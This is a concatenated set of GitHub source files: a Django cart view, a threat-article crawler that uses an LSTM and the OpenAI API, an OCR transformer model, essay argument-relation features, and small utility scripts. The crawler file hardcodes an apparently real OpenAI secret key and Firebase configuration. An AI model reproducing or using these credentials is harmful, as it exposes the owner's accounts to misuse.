= adet, fiyat = int(adet) * 
urunum.fiyat)\n sepet.save()\n uzunluk = Sepet.objects.filter(user = request.user)\n post = request.POST #Ajax'dan dönen post verilerini alıyoruz.\n\n # site_adi = post.get('site_adi') #Post değerinden site_adi verisini alıyoruz.\n\n # #Aynı şekilde diğer verileri de alıyoruz.\n # gonderen_kisi = post.get('urunId')\n # gonderilme_nedeni = post.get('adet')\n\n # result = True\n # message = \"\"\n # if site_adi==\"http://127.0.0.1:8000\":\n # message = \"http://127.0.0.1:8000 işlem başarılı\"\n # else:\n # message = \"Yazıklar olsun! :(\"\n # result = False\n\n\n \n context = {\n 'urunler':urunler,\n 'search':search,\n 'kategoriler':kategoriler,\n 'uzunluk':uzunluk,\n # 'result':result,\n # 'message':message\n }\n \n return render(request, 'index.html', context)\n\ndef detail(request, urunId):\n urun = Urun.objects.get(id = urunId)\n context = {\n 'urun':urun\n }\n return render(request, 'urun.html', context)\n\ndef olustur(request):\n form = UrunForm()\n if request.method == 'POST':\n form = UrunForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n messages.success(request, 'Ürün oluşturuldu')\n return redirect('index')\n context = {\n 'form':form\n }\n return render(request, 'olustur.html', context)\n\n\n# ckeditor\n\n# Ödeme\ndef success(request):\n messages.success(request, 'Ödeme başarılı')\n return redirect('index')\ndef failure(request):\n messages.error(request, 'Ödeme başarısız')\n return redirect('payment')\n\ndef sepet(request):\n urun = Sepet.objects.filter(user = request.user)\n toplam = 0\n \n for i in urun:\n toplam += i.fiyat\n \n if request.method == \"POST\":\n odeme = request.POST['odeme']\n \n odenen = Sepet.objects.filter(user = request.user)\n print(odenen[0].urun)\n odemeYap = Odeme.objects.create(\n toplamFiyat = odeme,\n user = request.user,\n )\n odemeYap.sepet.add(*odenen)\n \n\n odemeYap.save()\n \n return redirect('payment')\n context = {\n 'urun':urun,\n 'toplam':toplam\n }\n return render(request, 'sepet.html', context)","repo_name":"MervanKoncuk/django-nonreload-cart","sub_path":"urunler/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30907076819","text":"from urllib.parse import urlparse\nimport warnings\nfrom django.shortcuts import render\n\nfrom django.http import JsonResponse\nimport requests\nfrom bs4 import BeautifulSoup\nimport concurrent.futures\n\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\n\nimport webhdfs\nfrom hdfs import InsecureClient\n\nimport json\n\nimport numpy as np\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import load_model\n\n\nconfig = {\n \"apiKey\": \"AIzaSyAf4h3WS_PJIY_Q-C_3a1JLlk6YKiD8-yw\",\n \"authDomain\": \"my-project-1-666a4.firebaseapp.com\",\n \"projectId\": \"my-project-1-666a4\",\n \"storageBucket\": \"my-project-1-666a4.appspot.com\",\n \"messagingSenderId\": \"576412656365\",\n \"appId\": \"1:576412656365:web:6a1935b3482dcb61a0a2e4\",\n \"measurementId\": \"G-08HCHNFWXM\"\n}\n\nfirebase_admin.initialize_app(credentials.Certificate(\n r'D:\Workspace\RP317\Vigilance360-Server\server1\crawler\vigilance360-firebase.json'))\n\ndb = 
firestore.client()\n\n\ndef predict_category_lstm(example_text):\n loaded_lstm_model = load_model(\n 'D:\\\\Workspace\\RP317\\\\Vigilance360-Server\\\\server1\\\\crawler\\\\api\\\\lstm_model.h5')\n\n # Preprocess the example text\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts([example_text])\n example_text_sequence = tokenizer.texts_to_sequences([example_text])\n max_len = 100 # Adjust as needed\n example_text_padded = pad_sequences(example_text_sequence, maxlen=max_len)\n\n # Make predictions\n predictions = loaded_lstm_model.predict(example_text_padded)\n\n # Decode predictions back to labels\n predicted_labels = np.argmax(predictions, axis=1)\n\n # Map labels back to their original categories\n categories = ['hardware', 'software', 'os']\n predicted_category = categories[predicted_labels[0]]\n\n return predicted_category\n\n\ndef extract_features(article, category):\n api_key = \"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\"\n url = \"https://api.openai.com/v1/engines/text-davinci-003/completions\"\n\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"Bearer {api_key}\"\n }\n\n prompt = f\"\"\"Extract the following information from the given article\n :Category: ( article about Os, Hardware, Sofware or both) \n Name: should be company + product), \n if Category = os / software: version,\n if Category = hardware: model number, \n Threat Level: (High Risk or Low Risk), \n Components Affected:\n Overview, \n Description, \n Impact, \n Solution,\n Version,\n Reference,\n Disclaimer\n .Details of the Article : {article}\"\"\"\n\n data = {\n \"prompt\": prompt,\n \"max_tokens\": 200\n }\n\n response = requests.post(url, json=data, headers=headers)\n response_json = response.json()\n\n if \"choices\" in response_json and len(response_json[\"choices\"]) > 0:\n extracted_data = response_json[\"choices\"][0][\"text\"]\n\n result = {\"name\": \"\", \"threatLevel\": \"\", \"affected\": \"\", \"overview\": \"\",\n \"description\": \"\", \"impact\": \"\", \"solution\": \"\", \"version\": \"\", \"model\": \"\", \"reference\": \"\", \"disclaimer\": \"\"}\n\n lines = extracted_data.split('\\n')\n for line in lines:\n if line.startswith(\"Name: \"):\n result[\"name\"] = line.replace(\"Name: \", \"\")\n elif line.startswith(\"Threat Level: \"):\n result[\"threatLevel\"] = line.replace(\"Threat Level: \", \"\")\n elif line.startswith(\"Components Affected: \"):\n result[\"affected\"] = line.replace(\n \"Components Affected: \", \"\")\n elif line.startswith(\"Overview: \"):\n result[\"overview\"] = line.replace(\"Overview: \", \"\")\n elif line.startswith(\"Reference: \"):\n result[\"reference\"] = line.replace(\"Reference: \", \"\")\n elif line.startswith(\"Disclaimer: \"):\n result[\"disclaimer\"] = line.replace(\"Disclaimer: \", \"\")\n elif line.startswith(\"Description: \"):\n result[\"description\"] = line.replace(\"Description: \", \"\")\n elif line.startswith(\"Impact: \"):\n result[\"impact\"] = line.replace(\"Impact: \", \"\")\n elif line.startswith(\"Solution: \"):\n result[\"solution\"] = line.replace(\"Solution: \", \"\")\n elif category == \"os\" or category == \"software\":\n if line.startswith(\"Version: \"):\n result[\"version\"] = line.replace(\"Version: \", \"\")\n elif category == \"hardware\":\n if line.startswith(\"Model: \"):\n result[\"model\"] = line.replace(\"Model: \", \"\")\n return result\n\n else:\n return \"Extraction failed.\"\n\n\n__all__ = [\"extract_features\"]\n\n\ndef crawl_page():\n warnings.filterwarnings(\"ignore\", 
category=UserWarning)\n docs = db.collection('urls').get()\n paragraphs = []\n oses = []\n softwares = []\n hardwares = []\n links = []\n\n with concurrent.futures.ThreadPoolExecutor() as executor:\n futures = []\n for doc in docs:\n document = doc.to_dict()\n url = document['url']\n paragraph = get_paragraphs(url)\n osThreat = getOsThreat(paragraph)\n softwareThreat = getSoftwareThreat(paragraph)\n hardwareThreat = getHardwareThreat(paragraph)\n if (osThreat != ''):\n oses.append(osThreat)\n if (softwareThreat != ''):\n softwares.append(softwareThreat)\n if (hardwareThreat != ''):\n hardwares.append(hardwareThreat)\n return oses, softwares, hardwares\n\n\ndef get_paragraphs(url):\n response = requests.get(url)\n if response.status_code == 200:\n # Parse the HTML content\n soup = BeautifulSoup(response.content, 'html.parser')\n\n # Find all paragraph elements\n paragraphs = [p.get_text() for p in soup.find_all('p')]\n return paragraphs\n else:\n return []\n\n\ndef getOsThreat(paragraphs):\n category = predict_category_lstm(paragraphs)\n if category == 'os':\n print(category)\n return extract_features(paragraphs, category)\n else:\n return ''\n\n\ndef getSoftwareThreat(paragraphs):\n category = predict_category_lstm(paragraphs)\n if category == 'software':\n print(category)\n return extract_features(paragraphs, category)\n else:\n return ''\n\n\ndef getHardwareThreat(paragraphs):\n category = predict_category_lstm(paragraphs)\n if category == 'hardware':\n print(category)\n return extract_features(paragraphs, category)\n else:\n return ''\n\n\ndef sendDataToHadoop(request):\n oses, softwares, hardwares = crawl_page()\n print(oses)\n print(softwares)\n print(hardwares)\n softwareThreat = softwares\n hardwareThreat = hardwares\n osThreat = oses\n # Convert the list to JSON string\n softwareThreatContent = json.dumps(softwareThreat)\n hardwareThreatContent = json.dumps(hardwareThreat)\n osThreatContent = json.dumps(osThreat)\n\n # Path where you want to store the file in HDFS\n hdfs_software_path = \"/temp/software.json\"\n hdfs_hardware_path = \"/temp/hardware.json\"\n hdfs_os_path = \"/temp/os.json\"\n\n # Establish connection to HDFS using WebHDFS\n # client=webhdfs.API(host='localhost',port='50070')\n client = InsecureClient('http://localhost:50070')\n\n # client.upload(hdfs_file_path, local_file_path,overwrite=True)\n with client.write(hdfs_software_path, overwrite=True) as hdfs_file:\n hdfs_file.write(softwareThreatContent)\n\n with client.write(hdfs_hardware_path, overwrite=True) as hdfs_file:\n hdfs_file.write(hardwareThreatContent)\n\n with client.write(hdfs_os_path, overwrite=True) as hdfs_file:\n hdfs_file.write(osThreatContent)\n\n return HttpResponse(status=200)\n","repo_name":"linuka00/Vigilance360","sub_path":"Vigilance360-Server/server1/crawler/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"14769801786","text":"__author__ = 'ericshape'\n\nimport json\nfrom pprint import pprint\n\noutputFileName = 'graphEdges.json'\nfOutputFile = open(outputFileName,'w')\n\ni = 0\nwith open(\"user_info_complete_merged-0412_10\") as f:\n for line in f:\n requestData = json.loads(line)\n pprint(requestData, fOutputFile)\n\n # followerGroup = requestData['followers']\n # if followerGroup != [] and i < 100:\n # i +=1\n # friend = requestData['id']\n # for follower in followerGroup:\n # print >> fOutputFile, friend, ';' , 
follower\n","repo_name":"explorer-wei/unsupervised-event-extraction-from-news-and-twitter","sub_path":"Codes/twitter416/MergeGraph/ParseGraph.py","file_name":"ParseGraph.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15585127412","text":"from typing import List, Optional, Tuple\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom ocrstack.config.config import Config\nfrom ocrstack.data.collate import Batch\nfrom torch import Tensor\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\nfrom resnet import resnet34\n\n\nclass TransformerDecoderAdapter(nn.Module):\n\n '''\n This class adapts `nn.TransformerDecoder` class to the stack\n '''\n\n def __init__(self):\n super(TransformerDecoderAdapter, self).__init__()\n self.in_embed, self.out_embed = self.build_embedding()\n self.decoder = nn.TransformerDecoder(nn.TransformerDecoderLayer(128, 8), 1)\n self.sos_idx = 0\n self.eos_idx = 1\n\n def build_embedding(self) -> Tuple[nn.Module, nn.Module]:\n out_embed = nn.Linear(128, 114, bias=False)\n in_embed = nn.Embedding(114, 128, 2,_weight=out_embed.weight)\n return in_embed, out_embed\n\n def forward(self, memory, tgt, memory_key_padding_mask=None, tgt_key_padding_mask=None):\n # type: (Tensor, Tensor, Optional[Tensor], Optional[Tensor]) -> Tensor\n '''\n Arguments:\n ----------\n - memory: (B, S, E)\n - tgt: (B, T)\n\n Returns:\n --------\n - logits: (B, T, V)\n '''\n # Since transformer components working with time-first tensor, we should transpose the shape first\n tgt = self.in_embed(tgt) # [B, T, E]\n tgt = tgt.transpose(0, 1) # [T, B, E]\n\n memory = memory.transpose(0, 1) # [S, B, E]\n tgt_mask = generate_square_subsequent_mask(tgt.size(0)).to(memory.device)\n memory_mask = None\n output = self.decoder(tgt, memory, tgt_mask, memory_mask, tgt_key_padding_mask, memory_key_padding_mask)\n output = output.transpose(0, 1) # [B, T, E]\n output = self.out_embed(output) # [B, T, V]\n return output\n\n @torch.jit.export\n def decode(self, memory, max_length, memory_key_padding_mask=None):\n # type: (Tensor, int, Optional[Tensor]) -> Tensor\n batch_size = memory.size(0)\n inputs = torch.empty(batch_size, 1, dtype=torch.long, device=memory.device).fill_(self.sos_idx)\n outputs: List[Tensor] = [\n F.one_hot(inputs, num_classes=self.in_embed.num_embeddings).float().to(inputs.device)\n ]\n end_flag = torch.zeros(batch_size, dtype=torch.bool)\n for _ in range(max_length):\n text = self.forward(memory, inputs, memory_key_padding_mask, None) # [B, T, V]\n output = F.softmax(text[:, [-1]], dim=-1) # [B, 1, V]\n outputs.append(output) # [[B, 1, V]]\n output = output.argmax(-1, keepdim=False) # [B, 1]\n inputs = torch.cat((inputs, output), dim=1) # [B, T + 1]\n\n # set flag for early break\n output = output.squeeze(1) # [B]\n current_end = output == self.eos_idx # [B]\n current_end = current_end.cpu()\n end_flag |= current_end\n if end_flag.all():\n break\n\n return torch.cat(outputs, dim=1) # [B, T, V]\n\n\nclass GeneralizedConvSeq2Seq(nn.Module):\n\n def __init__(self):\n # type: (Config,) -> None\n super().__init__()\n self.backbone = resnet34(pretrained=False, num_layers=2)\n self.decoder = TransformerDecoderAdapter()\n self.max_length = 150\n\n def freeze(self):\n for param in self.parameters():\n param.requires_grad_(False)\n\n def predict(self, batch: Batch):\n predicts = self.forward(batch.images)\n return predicts\n\n def train_batch(self, batch: Batch):\n logits = 
self.forward(batch.images, batch.text, batch.lengths)\n return logits\n\n def compute_loss(self, logits, targets, lengths):\n packed_predicts = pack_padded_sequence(logits, lengths, batch_first=True)[0]\n packed_targets = pack_padded_sequence(targets, lengths, batch_first=True)[0]\n loss = F.cross_entropy(packed_predicts, packed_targets)\n return loss\n\n def example_inputs(self):\n return (torch.rand(1, 3, 64, 256), )\n\n def forward(self, images, text=None, lengths=None, image_padding_mask=None):\n # type: (Tensor, Optional[Tensor], Optional[Tensor], Optional[Tensor]) -> Tensor\n images = self.backbone(images) # B, C, H, W\n\n B, E, H, W = images.shape\n images = images.reshape(B, E, H * W) # B, E, H * W\n images = images.transpose(-2, -1) # B, S = H * W, E\n\n if image_padding_mask is not None:\n image_padding_mask = image_padding_mask.reshape(B, H * W)\n\n if self.training:\n return self._forward_training(images, text, lengths, image_padding_mask)\n else:\n return self._forward_eval(images, image_padding_mask)\n\n @torch.jit.unused\n def _forward_training(self, images, text=None, lengths=None, image_padding_mask=None):\n # type: (Tensor, Optional[Tensor], Optional[Tensor], Optional[Tensor]) -> Tensor\n text_padding_mask = generate_padding_mask_from_lengths(lengths - 1).to(images.device) # B, S\n logits = self.decoder(images, text[:, :-1],\n memory_key_padding_mask=image_padding_mask,\n tgt_key_padding_mask=text_padding_mask)\n loss = self.compute_loss(logits, text[:, 1:], lengths - 1)\n return loss\n\n def _forward_eval(self, images, image_padding_mask=None):\n # type: (Tensor, Optional[Tensor]) -> Tensor\n predicts = self.decoder.decode(images, self.max_length, image_padding_mask)\n return predicts\n\n\ndef generate_square_subsequent_mask(sz: int) -> torch.Tensor:\n r\"\"\"Generate a square mask for the sequence. 
The masked positions are filled with float('-inf').\n Unmasked positions are filled with float(0.0).\n \"\"\"\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask\n\n\ndef generate_padding_mask_from_lengths(lengths: torch.Tensor) -> torch.Tensor:\n B, S = len(lengths), lengths.max()\n padding_mask = torch.arange(0, S, device=lengths.device).expand(B, S) >= lengths.unsqueeze(-1)\n return padding_mask\n","repo_name":"VinhLoiIT/pytorch-load-weight","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14005206950","text":"def add_submission_func(exams: dict, users: dict, user: str, lang: str, score: str):\n current_score = int(score)\n if lang in exams.keys():\n exams[lang] += 1\n else:\n exams[lang] = 1\n if user in users.keys():\n if users[user] < current_score:\n users[user] = current_score\n else:\n users[user] = current_score\n return exams, users\n\n\ndef ban_participant_func(users: dict, user: str):\n if user in users.keys():\n users.pop(user)\n return users\n\n\ndef get_exam_result_func(exams: dict, users: dict):\n return f'Results:\\n' + '\\n'.join([f'{k} | {v}' for k, v in users.items()]) + \\\n '\\nSubmissions:\\n' + '\\n'.join([f'{k} - {v}' for k, v in exams.items()])\n\n\nexam_submissions = {}\nuser_submissions = {}\n\ninput_line = input()\nwhile input_line != 'exam finished':\n if 'banned' in input_line:\n command = input_line.split('-')\n username = command[0]\n user_submissions = ban_participant_func(user_submissions, username)\n else:\n username, language, points = input_line.split('-')\n exam_submissions, user_submissions = add_submission_func(exam_submissions, user_submissions, username, language,\n points)\n input_line = input()\nprint(get_exam_result_func(exam_submissions, user_submissions))\n","repo_name":"mi6oo6im/my_python_training","sub_path":"fundamentals/exercise_dictionaries/soft_uni_exam_results.py","file_name":"soft_uni_exam_results.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"20724783982","text":"from pos import pos\nimport json\nfrom collections import defaultdict, Counter\nfrom math import log\nDISCOURSE_RELATIONS = [\"Comparison\",\"Contingency\",\"Expansion\",\"Temporal\"]\nINDICATOR_TYPES = [\"forward\",\"backwards\",\"thesis\",\"rebuttal\"]\n\nclass ArgumentRelationIdentification(): \n def __init__(self, essay_name, components, relation_prob_file,lemma_file,relation_info_file=None): \n self.components = components\n self.is_training_data = False \n if relation_info_file is not None: \n self.idx_to_name = []\n self.is_training_data = True \n with open(relation_info_file) as file: \n info = json.load(file)\n self.position_to_name = {v:k for k,v in info[essay_name][\"idx_to_start\"].items()}\n self.relations = info[essay_name][\"outgoing_relations\"] \n for c in self.components: \n name = self.position_to_name[c[\"start\"]]\n self.idx_to_name.append(name) \n with open(relation_prob_file) as file: \n info = json.load(file)\n self.p_outgoing = info[\"outgoing\"]\n self.p_incoming = info[\"incoming\"]\n with open(lemma_file) as file: \n info = json.load(file)\n self.num_all_lemmas = info[\"num_all_lemmas\"]\n self.lemmas_incoming = info[\"lemmas_incoming\"]\n self.lemmas_outgoing = 
info[\"lemmas_outgoing\"]\n \n self.get_pointwise_mutual_info()\n self.get_production_rules()\n self.pairwise_features()\n \n def get_pointwise_mutual_info(self): \n # get PMI(t,d) for each token t and direction d \n for c in self.components: \n c[\"pmi_incoming\"] = []\n c[\"pmi_outgoing\"] = []\n for idx,prob in enumerate(c[\"p_token\"]):\n lemma = c[\"component_lemmas\"][idx]\n if lemma in self.lemmas_incoming and prob > 0: \n p_t_in = self.lemmas_incoming[lemma] / self.num_all_lemmas\n c[f\"pmi_incoming\"].append( log( p_t_in / (prob * self.p_incoming)) )\n else: \n c[f\"pmi_incoming\"].append(0)\n if lemma in self.lemmas_outgoing and prob > 0: \n p_t_out = self.lemmas_outgoing[lemma] / self.num_all_lemmas\n c[f\"pmi_outgoing\"].append( log( p_t_out / (prob * self.p_outgoing)) )\n else: \n c[f\"pmi_outgoing\"].append(0)\n \n # for c in self.components: \n # print(c[\"pmi_incoming\"],c[\"pmi_outgoing\"])\n\n\n def get_production_rules(self): \n production_rules = []\n for c in self.components: \n for rule in c[\"production_rules\"]: \n production_rules.append(f\"{rule}\")\n self.production_rules_500_most_common = Counter(production_rules).most_common(n=500)\n \n def pairwise_features(self): \n # key will be (i,j) where i is the idx of a source and j is the idx of a target \n self.pairwise = {} \n\n self.components_per_paragraph = defaultdict(list)\n idx_in_paragraph = 0 # variable to indicate the position of the component in a paragraph (e.g. idx 0 out of 4 components in the paragraph)\n for idx in range(len(self.components)): \n p_idx = self.components[idx][\"paragraph\"]\n idx_in_paragraph += 1 \n if p_idx not in self.components_per_paragraph:\n idx_in_paragraph = 0 \n self.components[idx][\"idx_in_paragraph\"] = idx_in_paragraph\n self.components_per_paragraph[p_idx].append(idx)\n\n for i, source in enumerate(self.components):\n for j, target in enumerate(self.components):\n # the source cannot equal the target \n if i == j: continue\n # the components must be in the same paragraph! \n if source[\"paragraph\"] != target[\"paragraph\"]: \n continue \n \n self.pairwise[f\"{i+1},{j+1}\"] = {\n # there is actually a directed edge from source to target \n \"is_a_relation\": 0, # default is false \n # number of tokens in both source and target \n \"num_tokens\": len(source[\"component\"]) + len(target[\"component\"]),\n # if source and target are present in the same sentence\n \"same_sentence\": 0, # default is false \n # if target present before source \n \"target_before_source\": 0, # default is false,\n # if pair is present in intro or conclusion. 
They are both in the same paragraph\n \"intro_or_conc\": source[\"intro/conc\"],\n # number of components between source and target\n \"num_between\": abs(source[\"idx_in_paragraph\"]-target[\"idx_in_paragraph\"])-1, \n # number of components in the covering paragraph \n \"num_in_paragraph\": len(self.components_per_paragraph[source[\"paragraph\"]]),\n # if target and source share at least one noun \n \"share_noun\": 0, # default is false \n # the number of nouns shared by target and source \n \"num_shared_nouns\":0, # default is none \n # source or target is first or last in paragraph \n \"first_or_last\": 0 # default is none \n }\n \n if self.is_training_data: \n if self.idx_to_name[j] in self.relations[self.idx_to_name[i]]: \n # print(self.idx_to_name[i], self.idx_to_name[j])\n # print(f\"{i+1},{j+1}\")\n self.pairwise[f\"{i+1},{j+1}\"][\"is_a_relation\"] = 1 \n\n self.pairwise[f\"{i+1},{j+1}\"].update(self.get_indicator_info(source,target))\n \n # get binary POS distribution with the POS distribution of the target \n for pos_type in pos.keys():\n self.pairwise[f\"{i+1},{j+1}\"][pos_type] = source[pos_type] + target[pos_type]\n\n # source and target are present in the same sentence\n if source[\"sentence\"] == target[\"sentence\"]: \n self.pairwise[f\"{i+1},{j+1}\"][\"same_sentence\"] = 1 # true \n \n # target is present before source \n if source[\"start\"] > target[\"start\"]: \n self.pairwise[f\"{i+1},{j+1}\"][\"target_before_source\"] = 1 # true \n \n # if target and source are first or last component in paragraph \n if source[\"first/last\"] or target[\"first/last\"]: \n self.pairwise[f\"{i+1},{j+1}\"][\"first_or_last\"] = 1 \n \n # find shared nouns (both binary and number)\n shared_nouns = []\n for idx, lemma in enumerate(source[\"component_lemmas\"]):\n if \"NN\" in source[\"component_pos\"][idx]: \n if lemma in target[\"component_lemmas\"]:\n shared_nouns.append(lemma)\n if len(shared_nouns) > 0: \n self.pairwise[f\"{i+1},{j+1}\"][\"share_noun\"] = 1\n self.pairwise[f\"{i+1},{j+1}\"][\"num_shared_nouns\"] = len(shared_nouns)\n\n # count how many times a production rule is shared by source and target \n self.pairwise[f\"{i+1},{j+1}\"].update(self.shared_production_rules(source,target))\n \n # get binary discourse triples of source and target \n self.pairwise[f\"{i+1},{j+1}\"].update(self.get_discourse_triples(source,target))\n\n # get pmi features \n self.pairwise[f\"{i+1},{j+1}\"].update(self.get_pmi_features(source,target))\n # get binary representation of the types of indicators that occur in and around \n # components between source and target \n self.get_indicators_between()\n\n # print for testing purposes \n # for pair,info in self.pairwise.items(): \n # # if pair[0] > 1: break\n # if info[\"is_a_relation\"]: \n # print(f\"{self.idx_to_name[pair[0]]} to {self.idx_to_name[pair[1]]}: {info}\\n\")\n # break\n \n def get_indicator_info(self,source,target):\n info = {}\n for type in INDICATOR_TYPES: \n component_key = f\"component_{type}_indicators\"\n if source[component_key] == 1 or target[component_key] == 1: \n # this indicator type is present in source or target \n info[component_key] = 1 \n else: \n # this indicator type is not present in source or target \n info[component_key] = 0 \n for context in [\"preceding\",\"following\"]: \n context_key = f\"{context}_{type}_indicators\"\n if source[context_key] == 1 or target[context_key] == 1:\n # this indicator type is present in the context of either source or target \n info[f\"context_{type}_indicators\"] = 1 \n else: \n # 
this indicator type is not present in the context of either source or target \n info[f\"context_{type}_indicators\"] = 0 \n return info\n\n def get_indicators_between(self):\n for pair in self.pairwise.keys(): \n s,t = int(pair.split(\",\")[0])-1, int(pair.split(\",\")[1])-1\n p_idx = self.components[s][\"paragraph\"]\n for type in INDICATOR_TYPES: \n key = f\"{type}_indicators\"\n self.pairwise[pair][f\"between_{key}\"] = 0\n \n for c in self.components_per_paragraph[p_idx]: \n # find a component that is between source and target \n # check if any of the four types of indicators occur in this component or its context \n if min(s,t) < c < max(s,t):\n for type in INDICATOR_TYPES: \n for location in [\"component\",\"preceding\",\"following\"]: \n key = f\"{type}_indicators\"\n if self.components[c][f\"{location}_{key}\"] == 1: \n self.pairwise[pair][f\"between_{key}\"] = 1 \n\n def shared_production_rules(self,source,target): \n info = { rule: 0 for rule, freq in self.production_rules_500_most_common}\n for rule in source[\"production_rules\"]: \n if rule in target[\"production_rules\"]: \n info[f\"{rule}\"] += 1 \n return info \n \n def get_discourse_triples(self,source,target): \n info = {}\n for relation in DISCOURSE_RELATIONS: \n for arg in [\"Arg1\",\"Arg2\"]:\n for type in [\"Explicit\",\"Implicit\"]: \n key = f\"{relation}_{arg}_{type}\"\n info[key] = source[key] + target[key]\n return info\n \n def get_pmi_features(self,source,target): \n info = {\n \"presence_positive_associations\":0, # default is false \n \"presence_negative_associations\":0, # default is false \n } \n positive, negative = 0,0 \n total = len(source[\"component_lemmas\"]) + len(target[\"component_lemmas\"])\n for direction in [\"incoming\",\"outgoing\"]: \n for lemma_pmi in source[f\"pmi_{direction}\"]: \n if lemma_pmi > 0: \n positive += 1 \n elif lemma_pmi < 0: \n negative += 1 \n info[\"ratio_positive_associations\"] = positive / total\n info[\"ratio_negative_associations\"] = negative / total \n if positive > 0: \n info[\"presence_positive_associations\"] = 1 \n if negative > 0: \n info[\"presence_negative_associations\"] = 1 \n return info\n\n# if __name__=='__main__':\n\n# essay_names = []\n# with open(f\"CS333AES/stab/assets/train_text.txt\",\"r\") as file: \n# for line in file.readlines(): \n# essay_names.append(line.split(\"-final/\")[1].strip(\"\\n\"))\n\n# for essay_name in essay_names: \n# # read component data for this essay \n# with open(f'CS333AES/stab/outputs/classification/{essay_name}.json') as file: \n# components = json.load(file)\n# # relation information for each essay \n# relation_info_file = \"CS333AES/stab/models/argument_relation_info.json\"\n# # relation probabilities \n# relation_prob_file = \"CS333AES/stab/models/relation_probabilities.json\"\n# # lemma information for components of training data \n# lemma_file = \"CS333AES/stab/models/training_data_lemmas.json\"\n# # run argument relation features extraction \n# argrelation = ArgumentRelationIdentification(essay_name, components,relation_prob_file,lemma_file,relation_info_file)\n# with open(f\"CS333AES/stab/outputs/relations/{essay_name}.json\", \"w\") as file:\n# json.dump(argrelation.pairwise, file)\n# print(essay_name)\n","repo_name":"KevinPHX/CS333AES","sub_path":"stab/lib/argument_relations.py","file_name":"argument_relations.py","file_ext":"py","file_size_in_byte":13096,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"19450374887","text":"#-*- coding: UTF-8 -*-\n\nfrom 
sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import r2_score\nfrom sklearn.model_selection import train_test_split\n\nimport datetime\nfrom functools import reduce\nimport re\nimport textwrap\nimport seaborn as seabornInstance\nimport matplotlib.pyplot as plt\n\nimport statsmodels.api as sm\nfrom statsmodels.iolib import summary,table\nfrom statsmodels.iolib.table import SimpleTable\nfrom statsmodels.iolib.tableformatting import fmt_latex, fmt_txt\nfrom statsmodels.iolib.summary2 import _make_unique,_col_info,summary_params,Summary\nfrom statsmodels.compat.python import lzip\n\nimport docx\nfrom docx.shared import Inches,Cm,Pt\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\nfrom docx.enum.table import WD_TABLE_ALIGNMENT\n\nimport sys, dateutil.parser, time, math, requests, re, json, os\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime as dt\nfrom collections import defaultdict\nfrom bson import json_util\nfrom bson.json_util import loads\n\n# Data processing and conversion\nclass NpEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.integer):\n return int(obj)\n elif isinstance(obj, np.floating):\n return float(obj)\n elif isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return super(NpEncoder, self).default(obj)\n\ndef stdtime(daytime):\n get=dateutil.parser.parse(daytime)\n return get\n\n# 2021.3.17 Lin revised interval, intervals\ndef interval(start_time,end_time,freq):\n data = pd.date_range(start=start_time,end=end_time,freq=freq)\n data = pd.DataFrame(data,columns=['stdtime'])\n data[freq]=1\n return data\n\ndef intervals(start_time,end_time,freq_list):\n data = pd.date_range(start=start_time,end=end_time,freq=\"1s\")\n data = pd.DataFrame(data,columns=['stdtime'])\n for sec in freq_list:\n final = data[[\"stdtime\"]].set_index(\"stdtime\").resample(sec,origin=\"start\").ffill().reset_index().rename(columns={\"index\":\"stdtime\"})\n final[sec]=1\n data = pd.merge(data,final,on=\"stdtime\",how=\"left\")\n data[sec] = data[sec].fillna(0).astype(int)\n return data\n\ndef lag(title,phase,data):\n for p in phase:\n df=data[title].shift(p)\n for t in title:\n df.rename(columns={t:\"lag\"+str(p)+\"_\"+t},inplace=True)\n data = pd.concat([data,df],axis=1)\n data = data.dropna().reset_index(drop=True)\n return data\n\n# Compute descriptive statistics\ndef status(data):\n data = pd.DataFrame([data.sum(),data.count(),data.min(),data.idxmin(),data.quantile(.25),data.median(),\n data.quantile(.75),data.mean(),data.max(),data.idxmax(),data.mad(),data.var(),\n data.std(),data.skew(),data.kurt()],index=['加總','總数','最小值','最小值位置','25%分位数',\n '中位数','75%分位数','均值','最大值','最大值位数','平均絕對偏差','方差','標準差','偏度','峰度'])\n return data\n\n\n# 21.03.30 Cao added the OLS regression defs\n# OLS regression part: the _col_params() and summary_col() functions are used together\n\n# %f -- keeps six digits after the decimal point; %.3f keeps 3 decimal places\n# %e -- six digits after the decimal point in exponential form; %.3e keeps 3 decimal places, using scientific notation\n# %g -- decimal form as long as six significant digits suffice, otherwise scientific notation; %.3g keeps 3 significant digits, decimal or scientific\ndef _col_params(result, \n float_format_t='%.4f',\n float_format_coef='%.2f',\n float_format_adjr='%.2f',\n stars=True):\n\n # Extract parameters\n res = summary_params(result)\n # Format float\n res['Coef.'] = res['Coef.'].apply(lambda x: float_format_coef % x)\n res['t'] = 